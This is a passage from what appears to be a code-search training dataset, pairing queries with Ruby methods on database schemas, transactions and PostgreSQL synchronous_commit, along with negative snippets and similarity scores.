"def tablename; datastore['TABLENAME']; end",
"def get_schema_struct(table_name)\n dbres = do_sql_command(\"DESC #{table_name};\")\n\n dbstruct = []\n\n if(dbres) then\n dbres.each_hash do | row |\n dbstruct_hash = {}\n row.each {|key, val|\n dbstruct_hash[key.downcase.to_sym] = val \n }\n dbstruct << dbstruct_hash\n end \n end\n\n dbstruct\nend",
"def schema_and_table_name\n if qualified_table_name.include? '.'\n schema_name, table_name = qualified_table_name.split('.', 2)\n else\n table_name = qualified_table_name\n schema_name = self.class.default_schema_name\n end\n [schema_name, table_name]\n end",
"def tables\r\n return @engine.tables\r\n end",
"def schema_ds_select(table_name, opts)\n cols = [:column_name___column, :data_type___db_type, :character_maximum_length___max_chars, \\\n :numeric_precision, :column_default___default, :is_nullable___allow_null]\n cols << :c__table_name unless table_name\n cols\n end",
"def index\n @schema_tables = SchemaTable.all\n end",
"def generate_dataset\n return nil if query.nil?\n # execute the query\n data = Array ActiveRecord::Base.connection.execute(query)\n return [] if data.empty?\n # Convert the query into an easy to read format\n @dataset = [data.first.keys]+data.map{|dd|dd.values}\n return @dataset\n end",
"def type\n 'dataset'\n end",
"def table; end",
"def table; end",
"def table; end",
"def table; end",
"def schema_source\n column_families\n end",
"def load_table_heading(conn, builder, table)\n primary_key_columns = []\n builder.heading{\n columns = conn.schema(table, {:reload => true})\n columns.each do |name, info|\n #puts info.inspect\n \n # find attribute definition\n defn = {:domain => dbtype_to_ruby_type(info),\n :mandatory => !info[:allow_null] }\n unless info[:ruby_default].nil?\n defn[:default] = info[:ruby_default]\n end\n \n # mark primary key columns\n if primary_key_columns and info[:primary_key]\n primary_key_columns << name \n end\n \n # build the attribute\n builder.attribute(name, defn)\n end\n }\n primary_key_columns\n end",
"def prepare_schema\n tables = [];ActiveRecord::Base.connection.execute(\"show tables\").each{|t| tables << t[0].strip}\n \n ActiveRecord::Schema.define do\n App.log.info(\"preparing schema\")\n \n unless tables.include?(\"services\")\n # a service entry\n begin\n create_table :services do |t|\n t.string :name\n t.string :status, :null => false, :default => \"active\"\n end\n add_index :services, :name\n rescue\n App.log_exception\n end\n end\n \n unless tables.include?(\"queries\")\n begin\n # queries\n create_table :queries do |t|\n t.string :query \n t.column :last_twid, :bigint, :null => false, :default => 0\n t.timestamp :last_run\n t.integer :last_result_count\n t.string :status, :default => 'active', :null=> false\n end\n add_index :queries, :query\n rescue\n App.log_exception\n end\n end\n \n unless tables.include?(\"tweets\")\n begin\n # cache of tweets\n create_table :tweets do |t|\n t.column :twid, :bigint, :null => false\n t.string :from_user\n t.string :to_user\n t.integer :from_user_id\n t.integer :to_user_id\n t.string :text\n t.string :profile_image_url\n t.timestamp :created_at\n end\n add_index :tweets, :twid\n rescue\n App.log_exception\n end\n end\n \n end # define schema\n end",
"def tables\n raise 'SevenZip#tables should never be called'\n end",
"def get(table)\n if internal?(table)\n INTERNAL_SCHEMATA[table.variable.name]\n else\n table_id = @table_manager.variable_id(table)\n Schema.new(\n @internal_evaluator.select(\n [\"column_name\", \"index\", \"type_id\", \"short_default\", \"boolean_default\", \"string_default\", \"double_default\", \"integer_default\"],\n \"schemata\",\n [\"table_id\"],\n [table_id]\n ).sort_by { |tuple| tuple[1] }.map do |tuple|\n name = tuple[0]\n type = StorageType.by_id(tuple[2])\n default = case type \n when StorageType::SHORT then tuple[3]\n when StorageType::BOOLEAN then tuple[4]\n when StorageType::STRING then tuple[5]\n when StorageType::DOUBLE then tuple[6]\n when StorageType::INTEGER then tuple[7]\n else\n raise\n end\n if default.nil?\n Column.new(name, type)\n else\n Column.new(name, type, default)\n end\n end\n )\n end\n end",
"def table\n Airmodel.client.table base_config[:base_id], base_config[:table_name]\n end",
"def tables(name = nil, schema = nil, table = nil)\n schema = schema ? \"'#{quote_string(schema)}'\" : 'CURRENT_SCHEMA'\n select_rows(\n \"SELECT table_name \"+\n \"FROM information_schema.tables \"+\n \"WHERE table_type = 'TABLE' \"+\n \" AND table_schema = #{schema} \"+\n (table ? \"AND table_name = '#{quote_string(table)}'\" : \"\"),\n SCHEMA_LOG_NAME\n ).map { |row|\n row[0]\n }\n end",
"def sqlite3_schema(table_name)\n table_schema = @dbm.sqlite3_pragma(table_name)\n\n # First, find the max lengths of each column's title strings\n # for nice print out in a fixed length of table format\n max_column_name_length = 0\n max_type_name_col_length = 22\n max_nullable_col_length = 10\n max_pk_col_length = 5\n\n table_schema.each {|schema|\n if max_column_name_length < schema[1].length\n max_column_name_length = schema[1].length\n end\n \n # Check null status and convert the stored binary value\n # into string \"YES\" or \"NO\"\n schema[3] = (schema[3] == 1 ? \"YES\":\"NO\")\n # Check primary key status and convert the stored\n # binary value into string \"YES\" or \"NO\"\n schema[5] = (schema[5] == 1 ? \"YES\":\"NO\")\n }\n\n # Print out the schema in a table format\n puts table_name\n printf \"%-5s | %-#{max_column_name_length}s | %-22s | %-5s | %-5s\\n\",\\\n \"CID\", \"NAME\", \"TYPE\", \"NULL?\", \"PK?\"\n dash_line_splitter = '-' * (50 + max_column_name_length)\n puts dash_line_splitter\n table_schema.each {|schema|\n printf \"%-5s | %-#{max_column_name_length}s | %-22s | %-5s | %-5s\\n\",\\\n schema[0].to_s, schema[1], schema[2], schema[3], schema[5]\n }\n end",
"def data\n datacolumns.reduce({}) do |t, col|\n t[col.name] = col.data; t\n end\n end",
"def tables\n table_names.map { |tn| table(tn) }\n end",
"def resource_schema\n schemated = {}\n resource.columns_hash.each { |key, value| schemated[key] = value.type }\n schemated\n end",
"def tables_from(db=current_database)\n end",
"def get_data_types(table_name) \r\n data_types = get_info(table_name, 'type')\r\n data_types.shift\r\n data_types\r\n end",
"def get_schemas\n @schemas\n end",
"def tables; ActiveRecord::Base.connection.tables; end",
"def tables\n execute(\"SHOW TABLES FROM #{@opts[:database]}\")\n .map{ |i| i.values }\n .reduce(:+)\n .map{ |i| i.to_sym }\n end",
"def metadata_table\n\t\t@store.metadata_table metadata\n\tend",
"def db_queries_table__samples\n [\n \"table1\",\n \"table2\"\n ]\n end",
"def schema\n @schema || (superclass.schema unless superclass == Model)\n end",
"def schema(table_name = nil, opts={})\n table_name = table_name.to_sym if table_name\n if opts[:reload] && @schemas\n if table_name\n @schemas.delete(table_name)\n else\n @schemas = nil\n end\n end\n\n if @schemas\n if table_name\n return @schemas[table_name] if @schemas[table_name]\n else\n return @schemas\n end\n end\n\n if table_name\n @schemas ||= {}\n if respond_to?(:schema_parse_table, true)\n @schemas[table_name] ||= schema_parse_table(table_name, opts)\n else\n raise Error, 'schema parsing is not implemented on this database'\n end\n else\n if respond_to?(:schema_parse_tables, true)\n @schemas = schema_parse_tables(opts)\n elsif respond_to?(:schema_parse_table, true) and respond_to?(:tables, true)\n tables.each{|t| schema(t, opts)}\n @schemas\n else\n raise Error, 'schema parsing is not implemented on this database'\n end\n end\n end",
"def load_physical_schema(conn, builder)\n builder.indexes{\n conn.tables.each{|table|\n conn.indexes(table).each_pair{|name, defn|\n next if defn[:unique]\n builder.index(name, {:relvar => table, :attributes => defn[:columns]})\n }\n }\n }\n end",
"def get_schema\n schema = CLIENT_TABLES.map {|t| {:name => t.table_name, :columns => table_schema(t)} }\n \n# respond_to do |format|\n# format.js { render({:content_type => :js, :text => schema.to_json}) }\n# end\n \n render_json schema.to_json\n end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n if ds.joined_dataset?\n # raise Error, \"Using a joined dataset as a model dataset is not support, use from_self on the dataset to wrap it in a subquery\" # SEQUEL5\n Sequel::Deprecation.deprecate(\"Using a joined dataset as a Sequel::Model dataset\", respond_to?(:cti_base_model) ? \"Use the class_table_inheritance plugin :alias option in #{cti_base_model.inspect}\" : \"Call from_self on the dataset to wrap it in a subquery\")\n end\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def tables\n @tables ||= {}.tap do |tables|\n parsed_data['tables'].map do |table|\n parsed_table_rows = parse_choices(table['rows'])\n tables[table['id']] = Table.new(table['name'], table['parameters'], parsed_table_rows)\n end\n end\n end"
] |
[
"0.76885384",
"0.740642",
"0.72837543",
"0.72820276",
"0.7032066",
"0.7010101",
"0.68253994",
"0.68143594",
"0.68125886",
"0.67858446",
"0.67315453",
"0.6719681",
"0.6707291",
"0.67013437",
"0.6655032",
"0.66547054",
"0.66547054",
"0.6615402",
"0.65927154",
"0.6584639",
"0.6564256",
"0.656425",
"0.65600425",
"0.65567446",
"0.6508285",
"0.6440765",
"0.641062",
"0.6408793",
"0.64084244",
"0.64076847",
"0.6384854",
"0.6379384",
"0.63643515",
"0.63489044",
"0.6339503",
"0.63239884",
"0.6276851",
"0.62630403",
"0.62517095",
"0.62517095",
"0.6243739",
"0.6235795",
"0.623286",
"0.6219354",
"0.6217911",
"0.6215517",
"0.62096596",
"0.61772376",
"0.61569136",
"0.6153807",
"0.61466694",
"0.61418897",
"0.6137816",
"0.6127764",
"0.6127173",
"0.6113112",
"0.60986084",
"0.6079736",
"0.60792327",
"0.60658413",
"0.605081",
"0.60411626",
"0.60404867",
"0.60404867",
"0.60395795",
"0.603451",
"0.6024579",
"0.6006318",
"0.59919137",
"0.5991517",
"0.597638",
"0.5973162",
"0.59496033",
"0.59496033",
"0.59496033",
"0.59496033",
"0.5935427",
"0.5922344",
"0.5914297",
"0.5910913",
"0.5894061",
"0.5894007",
"0.58925104",
"0.5875193",
"0.5867251",
"0.5855699",
"0.58537394",
"0.584956",
"0.58407843",
"0.58283335",
"0.5821317",
"0.58189356",
"0.5791877",
"0.5790935",
"0.5788976",
"0.57853466",
"0.5779224",
"0.5778865",
"0.5739416",
"0.57085997"
] |
0.73695695
|
2
|
If the :synchronous option is given and nonnil, set synchronous_commit appropriately. Valid values for the :synchronous option are true, :on, false, :off, :local, and :remote_write.
|
def begin_new_transaction(conn, opts)
super
if opts.has_key?(:synchronous)
case sync = opts[:synchronous]
when true
sync = :on
when false
sync = :off
when nil
return
end
log_connection_execute(conn, "SET LOCAL synchronous_commit = #{sync}")
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def synchronous_commit=(value)\n raise ArgumentError, \"argument must be true or false\" unless value == true || value == false\n\n execute \"SET #{'LOCAL' if open_transactions > 0} synchronous_commit TO #{value ? 'ON' : 'OFF'}\"\n end",
"def synchronous!\n @asynchronous = false\n end",
"def asynchronous!\n @asynchronous = true\n end",
"def synchronous?\n !@asynchronous\n end",
"def auto_commit(flag=true)\n\t\t@connection.set_auto_commit(flag)\n\tend",
"def auto_commit(flag=true)\n @connection.set_auto_commit(flag)\n end",
"def initial_commit?; end",
"def initial_commit?; end",
"def autocommit=(value)\n IBM_DB.autocommit(@conn, value ? IBM_DB::SQL_AUTOCOMMIT_ON : IBM_DB::SQL_AUTOCOMMIT_OFF)\n end",
"def autocommit=(value)\n raise NoMethodError, \"Not implemented for this raw driver\"\n end",
"def autocommit(flag)\n query \"set autocommit=#{flag ? 1 : 0}\"\n self\n end",
"def add_autocommit!(command)\n command.tap do |c|\n c[:autocommit] = false if in_transaction?\n end\n end",
"def transaction(force_sync = false, &block)\n # Ruby 1.9.3 does not support @mutex.owned?\n if @mutex.respond_to?(:owned?)\n force_sync = false if @mutex.locked? && @mutex.owned?\n else\n # If we allowed this in Ruby 1.9.3, it might possibly cause recursive\n # locking within the same thread.\n force_sync = false\n end\n if !force_sync && (@in_transaction || options[:without_mutex])\n block.call self\n else\n @mutex.synchronize do\n @in_transaction = true\n result = block.call\n @in_transaction = false\n result\n end\n end\n end",
"def transaction(&block)\n self['AutoCommit'] = false\n self.do_transaction(&block)\n self['AutoCommit'] = true\n end",
"def remote_sync_if_necessary(options={})\n false\n end",
"def sync=(value)\n\t\t\t\tsuper\n\t\t\t\t\n\t\t\t\tcase self.protocol\n\t\t\t\twhen 0, IPPROTO_TCP\n\t\t\t\t\tself.setsockopt(IPPROTO_TCP, TCP_NODELAY, value ? 1 : 0)\n\t\t\t\telse\n\t\t\t\t\tConsole.logger.warn(self) {\"Unsure how to sync=#{value} for #{self.protocol}!\"}\n\t\t\t\tend\n\t\t\trescue Errno::EINVAL\n\t\t\t\t# On Darwin, sometimes occurs when the connection is not yet fully formed. Empirically, TCP_NODELAY is enabled despite this result.\n\t\t\trescue Errno::EOPNOTSUPP\n\t\t\t\t# Some platforms may simply not support the operation.\n\t\t\t\t# Console.logger.warn(self) {\"Unable to set sync=#{value}!\"}\n\t\t\tend",
"def sync=(sync)\n if sync\n @target_stream.sync = true\n MiniTest::Unit.output = @target_stream\n end\n\n super\n end",
"def setnonblocking(enabled)\n\t\tsingleton_class.async_send_api = !enabled\n\t\tself.flush_data = !enabled\n\t\tsync_setnonblocking(true)\n\tend",
"def autocommit\n IBM_DB.autocommit(@conn) == 1\n end",
"def set_transaction_isolation(conn, opts)\n level = opts.fetch(:isolation, transaction_isolation_level)\n read_only = opts[:read_only]\n deferrable = opts[:deferrable]\n if level || !read_only.nil? || !deferrable.nil?\n sql = String.new\n sql << \"SET TRANSACTION\"\n sql << \" ISOLATION LEVEL #{Sequel::Database::TRANSACTION_ISOLATION_LEVELS[level]}\" if level\n sql << \" READ #{read_only ? 'ONLY' : 'WRITE'}\" unless read_only.nil?\n sql << \" #{'NOT ' unless deferrable}DEFERRABLE\" unless deferrable.nil?\n log_connection_execute(conn, sql)\n end\n end",
"def asynchronous?\n @asynchronous\n end",
"def async()\n merge(async: 'true')\n end",
"def autocommit=(p1)\n #This is a stub, used for indexing\n end",
"def commit!\n _commit( false )\n end",
"def tsync=(value)\n set_attr(:tsync, value ? 1 : 0)\n @tsync = value\n end",
"def sync=(arg0)\n end",
"def auto_exec(override_sync_exec: nil, override_async_exec: nil, &block)\n if override_sync_exec || override_sync_exec.nil? && !override_async_exec && sync_exec_required? && Config.auto_sync_exec? && !sync_exec_in_progress? && !async_exec_in_progress?\n sync_exec(&block)\n elsif override_async_exec || override_async_exec.to_s == 'unless_in_progress' && !async_exec_in_progress?\n async_exec(&block)\n else\n block.call\n end\n end",
"def iosync\n @tc_bdb.sync\n end",
"def sync_options; @sync_options ||= table_sync.sync_options; end",
"def force_begin_read_write\n @grpc_transaction = @connection.session.create_transaction\n end",
"def async=(value)\n @async = value == true ? default_async_processor : value\n end",
"def sync\n self.disabled_reason = nil\n if valid?\n execute_sync\n true\n else\n false\n end\n end",
"def commit mutations, transaction: nil\n mode = transaction.nil? ? :NON_TRANSACTIONAL : :TRANSACTIONAL\n service.commit project_id: project, database_id: database, mode: mode,\n mutations: mutations, transaction: transaction\n end",
"def auto_commit?\n @connection.auto_commit?\n end",
"def sync(&block)\n queue SyncCommand, [], {}, &block\n end",
"def begin_savepoint(conn, opts)\n super\n\n unless (read_only = opts[:read_only]).nil?\n log_connection_execute(conn, \"SET TRANSACTION READ #{read_only ? 'ONLY' : 'WRITE'}\")\n end\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def auto_commit?\n\t\t@connection.auto_commit?\n\tend",
"def autoflush=(autoflush)\n @connection.autoflush = autoflush\n end",
"def with_optional_transaction(bool, &block)\n bool ? transaction { yield } : yield\n end",
"def committed!\n @on_commit.each do |callback|\n callback.call\n end\n clear\n end",
"def commit_offsets(async: true)\n @mutex.lock\n\n internal_commit_offsets(async: async)\n ensure\n @mutex.unlock\n end",
"def commit_required?; end",
"def autocommit?()\n #This is a stub, used for indexing\n end",
"def set_async_defaults\n @async_transport_options ||= {}\n defaults = {\n queue: \"magic_pipe\"\n }\n @async_transport_options = defaults.merge(@async_transport_options)\n end",
"def is_commit()\n @is_commit\n end",
"def autocommit?\n raise NoMethodError, \"Not implemented for this raw driver\"\n end",
"def preset_eager_sync\n store = options.shift || :memory\n store = SYNC_STORES[store]&.call(config, *options) if store.is_a?(Symbol)\n self.store = store\n end",
"def perform_commit\n raise NotImplementedError\n end",
"def sync_options\n @sync_options ||= session.configuration.options_for_table(left_table)\n end",
"def supports_transaction_isolation?\n false\n end",
"def supports_transaction_isolation?\n false\n end",
"def sync\n event = :executed_command\n event\n end",
"def commit(soft_commit = false)\n session.commit soft_commit\n end",
"def begin_db_transaction\n @connection.autocommit = false\n end",
"def run!(options)\n display \"Initialising Ssync, performing pre-sync checks ...\"\n\n e! \"Couldn't connect to AWS with the credentials specified in '#{config_path}'.\" unless Setup.aws_credentials_is_valid?\n e! \"Couldn't find the S3 bucket specified in '#{config_path}'.\" unless Setup.bucket_exists?\n e! \"The local path specified in '#{config_path}' does not exist.\" unless Setup.local_file_path_exists?\n\n if options.force?\n display \"Clearing previous sync state ...\"\n clear_sync_state\n end\n create_tmp_sync_state\n\n if last_sync_recorded?\n display \"Performing time based comparison ...\"\n files_modified_since_last_sync\n else\n display \"Performing (potentially expensive) MD5 checksum comparison ...\"\n display \"Generating local manifest ...\"\n generate_local_manifest\n display \"Traversing S3 for remote manifest ...\"\n fetch_remote_manifest\n # note that we do not remove files on s3 that no longer exist on local host.\n # this behaviour may be desirable (ala rsync --delete) but we currently don't support it.\n display \"Performing checksum comparison ...\"\n files_on_localhost_with_checksums - files_on_s3\n end.each do |file|\n encrypt_file(file) if encrypting?\n push_file(file)\n end\n\n finalize_sync_state\n\n display \"Sync complete!\"\n clean_up_encrypted(true) if encrypting?\n \n end",
"def sync\n run 'sync', :quiet => true\n end",
"def sync\r\n\t\tsend('SYN', '0 0')\r\n\t\treturn 1\r\n\tend",
"def transaction(force_sync = false)\n force_sync = false if @mutex.locked? && @mutex.owned?\n\n if !force_sync && (@in_transaction || options[:without_mutex])\n yield self\n else\n @mutex.synchronize do\n @in_transaction = true\n result = yield\n @in_transaction = false\n result\n end\n end\n end",
"def perform_atomic_update(&block)\n Edition.connection.execute \"set transaction isolation level serializable\"\n Edition.connection.transaction do\n yield\n end\n end",
"def exec_sync\n raise \"You must override `exec_sync' in your class\"\n end",
"def on_prepare_commit(unit, aggregates, events); end",
"def transaction\n raise Mysql::Error, 'Not Connected' if @my.nil?\n\n if block_given?\n begin\n @my.query('START TRANSACTION WITH CONSISTENT SNAPSHOT')\n yield # Start executing the query black.\n @my.query('COMMIT')\n rescue Mysql::Error => e\n @my.query('ROLLBACK')\n raise e\n end\n end\n end",
"def supports_transaction_isolation?\n true\n end",
"def on_prepare_transaction_commit(unit, transaction); end",
"def sync=\n end",
"def sync_command local_directory\n config_file = settings[:s3cmd_config] ? \"--config=#{Shellwords.escape(settings[:s3cmd_config])}\" : \"\"\n \"#{s3cmd_program} sync #{Shellwords.escape(local_directory)} #{Shellwords.escape(s3_uri)} --no-delete-removed --bucket-location=#{settings[:region]} #{config_file} 2>&1\"\n end",
"def sync\n cached_dataset(:_sync) do\n clone(:async=>false)\n end\n end",
"def has_transactional_callbacks?\n true\n end",
"def transaction\n raise Mysql2::Error, 2002 if @my.nil?\n\n if block_given?\n begin\n @my.query('START TRANSACTION WITH CONSISTENT SNAPSHOT')\n yield # Start executing the query black.\n @my.query('COMMIT')\n rescue Mysql2::Error => e\n @my.query('ROLLBACK')\n raise e\n end\n end\n end",
"def internal_commit_offsets(async: true)\n return true unless @offsetting\n\n @kafka.commit(nil, async)\n @offsetting = false\n\n true\n rescue Rdkafka::RdkafkaError => e\n return false if e.code == :assignment_lost\n return true if e.code == :no_offset\n\n raise e\n end",
"def set_sync_status\n sync_status = ActiveModel::Type::Boolean.new.cast(directory_listing_params[:sync_status])\n if sync_status.nil?\n @directory_listing.update(sync_status: true)\n else\n @directory_listing.update(sync_status: sync_status)\n end\n end",
"def commit( defer=false )\n save_logic( defer, false )\n end",
"def begin_db_transaction\n # PG driver doesn't really do anything on setAutoCommit(false)\n # except for commit-ing a previous pending transaction if any\n log('/* BEGIN */') { @connection.begin }\n end",
"def commit\n @MySQLConnection.query('commit')\n end",
"def execute_async?\n @execution_mode == :async\n end",
"def sync_cmd\n warn(\"Legacy call to #sync_cmd cannot be preserved, meaning that \" \\\n \"test files will not be uploaded. \" \\\n \"Code that calls #sync_cmd can now use the transport#upload \" \\\n \"method to transfer files.\")\n end",
"def wake_worker_after_commit\n false\n end",
"def wake_worker_after_commit\n false\n end",
"def commit\n if defined? _commit\n if dirty?\n _commit\n end\n end\n nil\n end",
"def ensure_sync_state\n unless @ensured_sync_state\n ReplicationInitializer.new(session).ensure_sync_state\n @ensured_sync_state = true\n end\n end",
"def begin_transaction(conn, opts={})\n set_transaction_isolation(conn, opts)\n super\n end",
"def run_autosync\n begin\n self.status = _(\"Synchronizing organisations.\")\n self.update_organisation_cache\n \n self.status = _(\"Synchronizing worktime.\")\n self.update_worktime_cache\n \n self.status = _(\"Automatic synchronization done.\")\n rescue => e\n self.status = sprintf(_(\"Error while auto-syncing: %s\"), e.message)\n puts Knj::Errors.error_str(e)\n ensure\n @sync_thread = nil\n end\n end",
"def tx_commit(&block)\n @connection.send_frame(Protocol::Tx::Commit.encode(@id))\n\n self.redefine_callback :tx_commit, &block\n self\n end",
"def commit_if_dirty\n # no op\n end",
"def auto_transaction(run_with_auto_tx)\n @auto_transaction = run_with_auto_tx\n end",
"def commit_transaction(conn, opts=OPTS)\n if (s = opts[:prepare]) && savepoint_level(conn) <= 1\n log_connection_execute(conn, \"PREPARE TRANSACTION #{literal(s)}\")\n else\n super\n end\n end",
"def sync(options = {})\n assert_open\n assert_keys(options,\n :supported => [:path, :callback, :callback_context],\n :required => [:path, :callback])\n\n req_id = setup_call(:sync, options)\n\n rc = super(req_id, options[:path]) # we don't pass options[:callback] here as this method is *always* async\n\n { :req_id => req_id, :rc => rc }\n end",
"def asynchronous?() false end",
"def remove_transaction(conn, committed)\n conn.autocommit = true\n ensure\n super\n end",
"def sync() end",
"def sync() end",
"def sync() end",
"def commit_stream(shutdown=false)\n @queue = get_queue\n @queue.run # Notify other workers that the commit queue is open for business again\n # No point in continuing if we're not ready\n return :wait unless commit_ready? or shutdown\n # Convert commit_delay to ms\n lock_ttl = @commit_delay * 1000\n lock_ttl = @lock_timeout if lock_ttl < @lock_timeout\n commit_lock = false\n # Acquire a lock to prevent other workers from executing this function.\n @semaphore.lock(commit_lock_key) do |locked|\n return :wait unless locked\n # Hopefully, redlock-rb will accept our pull request so we don't need this rescue block anymore\n begin\n commit_lock = @commit_lock_manager.lock(commit_lock_key, lock_ttl)\n rescue Redis::BaseConnectionError\n return :wait\n end\n # We'll be locking API later on\n api_lock = false\n return :wait unless commit_lock\n\n begin\n # Block everybody from uploading now\n @queue.commit_status = :running\n # Keep hanging on to the commit lock until we can commit.\n while commit_lock\n # Don't commit unless we're ready or shutting down Logstash\n # Grab the lock again if we managed to lose it while sleeping\n unless commit_lock\n commit_lock = @commit_lock_manager.lock(commit_lock_key, lock_ttl)\n end\n break unless commit_lock\n # Clear out the queue\n send_to_domo(shutdown, true) until @queue.processed?(shutdown)\n # Acquire a lock on the key used for the non-commit API calls so nobody goes and creates a new Stream Execution in the middle of this.\n api_lock = @commit_lock_manager.lock(lock_key, @lock_timeout)\n break unless api_lock and commit_lock\n # Make sure the API lock and commit lock will last for at least the same amount of time.\n if commit_lock[:validity] <= api_lock[:validity]\n commit_lock = @commit_lock_manager.lock(commit_lock_key, lock_ttl, extend: commit_lock, extend_only_if_locked: true)\n end\n\n # Validate the active Stream Execution\n unless @queue.execution_id\n @queue.commit_status = :open\n break\n end\n # Do one last validation on the Stream Execution and abort if there are irregularities.\n begin\n stream_execution = @domo_client.stream_client.getExecution(@stream_id, @queue.execution_id)\n rescue Java::ComDomoSdkRequest::RequestException => e\n status_code = Domo::Client.request_error_status_code(e)\n if status_code.nil? or status_code == -1\n @logger.debug(\"We got a status code of -1 somehow. Let's look at the exception.\",\n :exception => e,\n :status_code => status_code,\n :message => e.to_s)\n end\n # The Execution no longer exists.\n if status_code == 404 or status_code == -1\n @queue.commit_status = :open\n @commit_lock_manager.unlock(api_lock) if api_lock\n @commit_lock_manager.unlock(commit_lock) if commit_lock\n return :open\n else\n @commit_lock_manager.unlock(api_lock) if api_lock\n @commit_lock_manager.unlock(commit_lock) if commit_lock\n raise e\n end\n end\n # Abort errored out streams\n if stream_execution.currentState == \"ERROR\" or stream_execution.currentState == \"FAILED\"\n @domo_client.stream_client.abortExecution(@stream_id, stream_execution.getId)\n @logger.error(\"Execution ID for #{stream_execution.getId} for Stream ID #{@stream_id} was aborted due to an error.\",\n :stream_id => @stream_id,\n :dataset_id => @dataset_id,\n :execution_id => stream_execution.getId,\n :execution_state => stream_execution.currentState,\n :execution => stream_execution.to_s)\n @queue.commit_status = :failed\n # Commit!\n elsif stream_execution.currentState == \"ACTIVE\"\n execution_id = stream_execution.getId\n # Block everybody from uploading again\n @queue.commit_status = :running\n sleep(0.5) # Race conditions are a PITA\n # Start the commit\n @logger.info(\"Beginning commit of Stream Execution #{execution_id} for Stream ID #{@stream_id}.\",\n :stream_id => @stream_id,\n :pipeline_id => pipeline_id,\n :dataset_id => @dataset_id,\n :execution_id => execution_id,\n :commit_rows => @queue.commit_rows,\n :execution => stream_execution.to_s)\n stream_execution = Concurrent::Future.execute { @domo_client.stream_client.commitExecution(@stream_id, execution_id) }\n until stream_execution.complete?\n sleep(0.5)\n # Keep the locks active\n if commit_lock[:validity] <= 1000 or api_lock[:validity] <= 1000\n commit_lock = @commit_lock_manager.lock(commit_lock_key, lock_ttl, extend: commit_lock, extend_only_if_locked: true)\n api_lock = @commit_lock_manager.lock(lock_key, @lock_timeout, extend: api_lock, extend_only_if_locked: true)\n end\n end\n\n stream_execution = stream_execution.value\n # Wait until the commit is actually done processing\n while stream_execution&.currentState == \"ACTIVE\"\n sleep(0.5)\n # Attempt to grab the lock again if we lost it\n commit_lock = @commit_lock_manager.lock(commit_lock_key, lock_ttl) unless commit_lock\n # Give up if we still can't get it\n return :wait unless commit_lock\n # Keep the locks active\n commit_lock = @commit_lock_manager.lock(commit_lock_key, lock_ttl, extend: commit_lock, extend_only_if_locked: true) if commit_lock[:validity] <= 1000\n api_lock = @commit_lock_manager.lock(lock_key, @lock_timeout, extend: api_lock, extend_only_if_locked: true) if api_lock and api_lock[:validity] <= 1000\n # Update the StreamExecution from the API.\n begin\n stream_execution = @domo_client.stream_client.getExecution(@stream_id, execution_id)\n rescue Java::ComDomoSdkRequest::RequestException => e\n # Almost every exception means we're done.\n status_code = Domo::Client.request_error_status_code(e)\n if status_code.nil? or status_code == -1\n @logger.debug(\"We got a status code of -1 somehow. Let's look at the exception.\",\n :exception => e,\n :status_code => status_code,\n :message => e.to_s)\n end\n if status_code == 404 or status_code < 400 or status_code >= 500\n break\n else\n raise e\n end\n end\n end\n # Mark the queue as successfully committed.\n commit_rows = @queue.commit_rows\n @queue.commit\n @logger.info(\"Committed Execution ID for #{execution_id} for Stream ID #{@stream_id}.\",\n :stream_id => @stream_id,\n :pipeline_id => pipeline_id,\n :dataset_id => @dataset_id,\n :execution_id => execution_id,\n :commit_rows => commit_rows,\n :execution => stream_execution.to_s)\n else\n @logger.warn(\"Stream Execution ID #{stream_execution.getId} for Stream ID #{@stream_id} could not be committed or aborted because its state is #{stream_execution.currentState}\",\n :stream_id => @stream_id,\n :pipeline_id => pipeline_id,\n :dataset_id => @dataset_id,\n :commit_rows => @queue.commit_rows,\n :execution_id => stream_execution.getId,\n :execution_state => stream_execution.currentState,\n :execution => stream_execution.to_s)\n @queue.commit_status = :failed\n end\n break\n end\n # Make sure to unlock all the locks\n ensure\n @commit_lock_manager.unlock(api_lock) if api_lock\n @commit_lock_manager.unlock(commit_lock) if commit_lock\n # Open the queue back up if the execution failed\n @queue.commit_status = :open if @queue.commit_status == :running\n end\n end\n # Return the status of the commit.\n @queue.commit_status\n end",
"def sync(options = {})\n assert_open\n assert_supported_keys(options, [:path, :callback, :callback_context])\n assert_required_keys(options, [:path, :callback])\n\n req_id = setup_call(:sync, options)\n\n rc = super(req_id, options[:path]) # we don't pass options[:callback] here as this method is *always* async\n\n { :req_id => req_id, :rc => rc }\n end",
"def begin_transaction(mutable: false, graph_name: nil)\n raise NotImplementedError\n end",
"def commit_if_dirty(soft_commit = false)\n session.commit_if_dirty soft_commit\n end",
"def run_in_transaction isolation\n if isolation\n Base.transaction isolation: isolation do\n yield\n end\n else\n yield\n end\n end",
"def run_in_transaction isolation\n if isolation\n Base.transaction isolation: isolation do\n yield\n end\n else\n yield\n end\n end"
] |
[
"0.79772484",
"0.6915001",
"0.59547013",
"0.5716413",
"0.5692907",
"0.5628751",
"0.5575133",
"0.5575133",
"0.5518805",
"0.5504294",
"0.5468508",
"0.53467554",
"0.53143233",
"0.53134865",
"0.52963495",
"0.5211512",
"0.5206623",
"0.51856744",
"0.5146709",
"0.51061195",
"0.509536",
"0.5079896",
"0.5078062",
"0.507582",
"0.50333816",
"0.50195354",
"0.5018583",
"0.49996987",
"0.4993746",
"0.49844766",
"0.49821228",
"0.49789977",
"0.49691677",
"0.49574947",
"0.49350795",
"0.4928571",
"0.49018326",
"0.49018326",
"0.4901525",
"0.48943514",
"0.4852806",
"0.48494792",
"0.48455817",
"0.48145074",
"0.4793017",
"0.47913107",
"0.4784024",
"0.47832406",
"0.47584924",
"0.47566053",
"0.47547272",
"0.47520134",
"0.47520134",
"0.47517073",
"0.47504413",
"0.47441614",
"0.47311452",
"0.47129986",
"0.47075883",
"0.46920627",
"0.46855506",
"0.4676963",
"0.4673785",
"0.46618974",
